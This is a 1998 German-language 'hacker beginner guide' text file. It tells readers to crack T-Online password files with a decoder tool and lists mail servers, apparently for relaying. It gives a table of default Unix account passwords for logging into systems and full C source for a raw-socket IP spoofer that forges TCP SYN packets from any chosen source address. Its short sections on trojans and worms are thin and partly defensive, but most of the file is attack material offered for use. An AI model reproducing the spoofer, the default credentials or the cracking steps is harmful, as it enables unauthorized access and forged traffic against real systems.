                 -------------------------------------
                 -H A C K E R S  Beginning  G U I D E-
                 -                                   -
                 -           2.0   by ord God       -
                 -                                   -
                 +++++++++++++++++++++++++++GH++++++++
                 -------------------------------------
                 [Guide 2.0 +++ Hacking fun! +++ GH++]


Hallo, willkommen zum 2. Teil des Hacker Beginning G U I D E s!
Wer also sein Wissen erweitern mchte, kann es nun tun indem er einfach weiter
liest und lernt!

Inhalt:
- - - - - - - - - - - - - - - - -
1. T-online Hacking             |
2. Was ist ein Trojaner?        |
3. Was ist ein Internet Worm?   |
4. Mail Servers                 |
5. UNiX stuFF                   |
6. IP Spoofing                  |
- - - - - - - - - - - - - - - - -
7. About                        |
8. Infoz                        |
- - - - - - - - - - - - - - - - - 


1. T-ONLiNE Hacking:

Wer T-online benutzt sollte mal einige Experimente machen!
Eines, seine eigenen Pwds zu cracken!
Kein problem, man mu nur wissen wie, als erstes die Datei "dbserver.ini" suchen
und sie mit einem t-decoder hacker cracken!
Das ist der leichteste Weg!
Wenn man das geschafft hat ist es kein Problem mehr und man hat einwenig mehr 
Controlle und sicherheit!
(Manche lassen ihre Pwds auch in der Datei "Passwort.ini" gespeichert!)


2. Was ist ein Trojaner?

Wer kennt das nicht, man findet ein geiles prog im Net und es ist genau das was man sucht!
Doch irgendwie hat man das gefhl das da was nicht stimmt!
Ein trojaner ist nmlich immer versteckt, Das prog spielt dem Benutzer etwas vor
und im Hintergrund arbeitet der Trojaner!
Er verschickt dann (ohne das man was ahnt) die passwrter von t-Online oder 
er ermglicht jemanden die controlle auf dem betroffenen Pc!
Wer sich schtzen will , sollte nur progs nehmen wo er sicher ist das es sicher ist ;)!

3. Was ist ein I Worm?

Das sind kleine Viren die sich selbst vermehren ber das Internet!
Sogenannte I Wrmer sind eigentlich schwer zu endecken...!
Vor sowas kann man sich nur schtzen wenn man keinen Internet zugang hat oder
erst gar keinen Pc hat [schlechte Aussichten ;)]

4. MailServers!
_______________________________________________________________
rome.ccomm.com    
wisdom.psinet.net.au 
emout17.mail.aol.com 
mdr.de 
manado.webindonesia.com ***************schnell*****************
emout29.mail.aol.com 
from m16.boston.juno.com 
eleventh2.inil.com      ***************Sehr schnell************
portland.cbn.net.id 
pnccwg.palaunet.com 
bonn.netsurf.de
server.compunort.com.ar 
mail1-gui.server.virgin.net 
nontri.ku.ac.th 
mail2.isdnet.net 
gandalf.leader.es 
smtp-0.indo.net.id 
sirius.hkstar.com 
triton.worldonline.nl 
brickbat8.mindspring.com 
ieva06.lanet.lv 
www.aiusa.com 
brick.purchase.edu 
rush.u-netsys.com.br
sweden.it.earthlink.net 
SWBELL.net 
elf.ecitele.com 
future.futureone.com 
dinet.de 
enterprise.powerup.com.au 
ns.ezl.com 
zenon.logos.cy.net   
dino.mainz.ibm.de 
out2.ibm.net 
smtp1.wanadoo.fr 
beta.mcit.com 
hp1.p-ol.com 
revere.musc.edu 
alpha.ntu.ac.sg ***********************Sehr schnell*************************** 
mail.uniserve.com 
UTMJB.UTM.MY    ***********************Sehr schnell*************************** 
mimos.my 
deneb.dfn.de 
nontri.ku.ac.th 
weblock.tm.net.my 
mail.secc.cc.ia.us  
main.com2com.ru
mail.ptd.net
lilly.ping.de 
smtp1.erols.com 
crotalus.famu.edu 
mail.uniserve.com
__________________

5. UNiX StuFF

ACCOUNT                         PASSWORD
~~~~~~~                         ~~~~~~~~
root                            root      - Rarely open to hackers
sys                             sys / system / bin
bin                             sys / bin
mountfsys                       mountfsys
adm                             adm
uucp                            uucp
nuucp                           anon
anon                            anon
user                            user
games                           games
install                         install
reboot                          * See Below
demo                            demo
umountfsys                      umountfsys
sync                            sync
admin                           admin
guest                           guest
daemon                          daemon

6. IP Spoofing [C compiler]

Profies programmen sich ihren eigenen Spoofer!

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>

unsigned short ip_cksum(unsigned char * buff, int len)
{
        unsigned long sum = 0;
        if (len > 3)
        {
                __asm__("clc\n"
                "1:\t"
                "lodsl\n\t"
                "adcl %%eax, %%ebx\n\t"
                "loop 1b\n\t"
                "adcl $0, %%ebx\n\t"
                "movl %%ebx, %%eax\n\t"
                "shrl $16, %%eax\n\t"
                "addw %%ax, %%bx\n\t"
                "adcw $0, %%bx"
                : "=b" (sum) , "=S" (buff)
                : "0" (sum), "c" (len >> 2) ,"1" (buff)
                : "ax", "cx", "si", "bx" );
        }
        if (len & 2)
        {
                __asm__("lodsw\n\t"
                "addw %%ax, %%bx\n\t"
                "adcw $0, %%bx"
                : "=b" (sum), "=S" (buff)
                : "0" (sum), "1" (buff)
                : "bx", "ax", "si");
        }
        if (len & 1)
        {
                __asm__("lodsb\n\t"
                "movb $0, %%ah\n\t"
                "addw %%ax, %%bx\n\t"
                "adcw $0, %%bx"
                : "=b" (sum), "=S" (buff)
                : "0" (sum), "1" (buff)
                : "bx", "ax", "si");
        }
        sum =~sum;
        return(sum & 0xffff);
}

unsigned short tcp_check(struct tcphdr *th, int len,
          unsigned long saddr, unsigned long daddr)
{
        unsigned long sum;
        __asm__("
            addl %%ecx, %%ebx
            adcl %%edx, %%ebx
            adcl $0, %%ebx
            "
        : "=b"(sum)
        : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
        : "bx", "cx", "dx" );
        __asm__("
            movl %%ecx, %%edx
            cld
            cmpl $32, %%ecx
            jb 2f
            shrl $5, %%ecx
            clc
1:          lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            loop 1b
            adcl $0, %%ebx
            movl %%edx, %%ecx
2:          andl $28, %%ecx
            je 4f
            shrl $2, %%ecx
            clc
3:          lodsl
            adcl %%eax, %%ebx
            loop 3b
            adcl $0, %%ebx
4:          movl $0, %%eax
            testw $2, %%dx
            je 5f
            lodsw
            addl %%eax, %%ebx
            adcl $0, %%ebx
            movw $0, %%ax
5:          test $1, %%edx
            je 6f
            lodsb
            addl %%eax, %%ebx
            adcl $0, %%ebx
6:          movl %%ebx, %%eax
            shrl $16, %%eax
            addw %%ax, %%bx
            adcw $0, %%bx
            "
        : "=b"(sum)
        : "0"(sum), "c"(len), "S"(th)
        : "ax", "bx", "cx", "dx", "si" );

        /* We only want the bottom 16 bits, but we never cleared the top 16. */

        return((~sum) & 0xffff);
}

void resolve_address(struct sockaddr *addr, char *hostname, u_short port) {
struct sockaddr_in *address;
struct hostent *host;

address = (struct sockaddr_in *)addr;
(void) bzero((char *)address, sizeof(struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname);
if ((int)address->sin_addr.s_addr == -1) {
  host = gethostbyname(hostname);
  if (host) {
   bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length);
  }
  else {
   puts("Couldn't resolve address!!!");
   exit(-1);
  }
 }
}

char *create_ip(u_long source, u_long dest, u_char protocol, u_char ttl, 
	u_short id, char *data, int data_len)
{
 char *ip_datagram;
 struct iphdr *ip_header; 
 ip_datagram = malloc(sizeof(struct iphdr) + data_len);
 ip_header = ip_datagram;
 ip_header->version   = 4;
 ip_header->tos       = 0;
 ip_header->frag_off  = 0;
 ip_header->check     = 0;
 ip_header->saddr     = source;
 ip_header->daddr     = dest;
 ip_header->protocol  = protocol;
 ip_header->ttl       = ttl;
 ip_header->id        = htons(id);
 ip_header->ihl       = 5;
 ip_header->tot_len   = htons(sizeof(struct iphdr) + data_len); 
 ip_header->check = htons(ip_cksum(ip_datagram,sizeof(struct iphdr)));
 bcopy(data,ip_datagram+sizeof(struct iphdr),data_len);
 return ip_datagram;
}

char *create_tcp(u_long source, u_long dest, u_short sport, u_short dport, 
	u_long seqnum, u_long acknum, u_char flags, char *data, int datalen) 
{
 char *wewt;
 struct tcphdr *tcp_header;
 wewt = malloc(sizeof(struct tcphdr) + datalen);
 tcp_header = wewt;
 tcp_header->th_sport = sport;
 tcp_header->th_dport = dport;
 tcp_header->th_seq   = seqnum;
 tcp_header->th_ack   = acknum;
 tcp_header->th_flags = flags;
 tcp_header->th_sum   = 0;
 tcp_header->th_sum = htons(tcp_check(tcp_header, sizeof(struct tcphdr), 
    source, dest));
 bcopy(data,wewt+sizeof(struct tcphdr),datalen);
 return wewt;
}

void sendpack(char *fromhost, int fromport, char *tohost, int toport) {
 char *packet;
 char *tcppacket;
 char *sendme;
 static struct sockaddr_in local, remote;
 static int sock = 0;
 if (!sock) {
   resolve_address((struct sockaddr *)&local, fromhost, fromport);
   resolve_address((struct sockaddr *)&remote, tohost, toport);
   sock = socket(AF_INET, SOCK_RAW, 255);
   if (sock == -1) { perror("Getting raw socket"); exit(-1); }
  }
   tcppacket = create_tcp(&local.sin_addr, &remote.sin_addr, 
	local.sin_port, remote.sin_port, 795930600, 0, TH_SYN,
	NULL, 0);
   packet = create_ip(&local.sin_addr, &remote.sin_addr,
	6, 24, 4, NULL, 0);
   sendme = (struct iphdr *)packet;
   bcopy(tcppacket, sendme+sizeof(struct iphdr), sizeof(tcppacket));
   printf("the ip header is %d bytes long.\n", sizeof(struct iphdr));
   printf("the tcp header is %d bytes long.\n", sizeof(struct tcphdr));
   printf("the ip packet is %d bytes long.\n", sizeof(packet));
   printf("the tcp packet is %d bytes long.\n", sizeof(tcppacket));
   printf("the final packet is %d bytes long.\n", sizeof(sendme));
  {
   int result;

   result = sendto(sock, packet, sizeof(packet), 0,
	(struct sockaddr *)&remote, sizeof(remote));
   if (result != sizeof(packet)) { perror("sending packet"); }
  }
}

main(int argc, char **argv) {
if (argc!=5) {
 printf("usage: %s <from host> <from port> <to host> <to port>\n", argv[0]);
 exit(-1);
}
 printf("forging packet from %s.%d to %s.%d\n", argv[1], atoi(argv[2]), 
	argv[3], atoi(argv[4]));
 sendpack(argv[1], atoi(argv[2]), argv[3], atoi(argv[4]));
}

7. About!

Hackerz Beginning G U I D E 1-2 are copyrighted by ord God
You have any questions, ask me!
On ICQ or e-Mail!

8. Infoz

Writer is ord God [przident of THE GH]
You might a Hacker?
Come on the GH Page and joining our group!
We greetz all Hackerz in the NET!

[http://welcome.to/thegh]
[lordgod@gmx.net]

1998 (c) by ord God [vizepresident of HoleONE][president of GH][member of HCD][president of Wfg]
All rights reserved
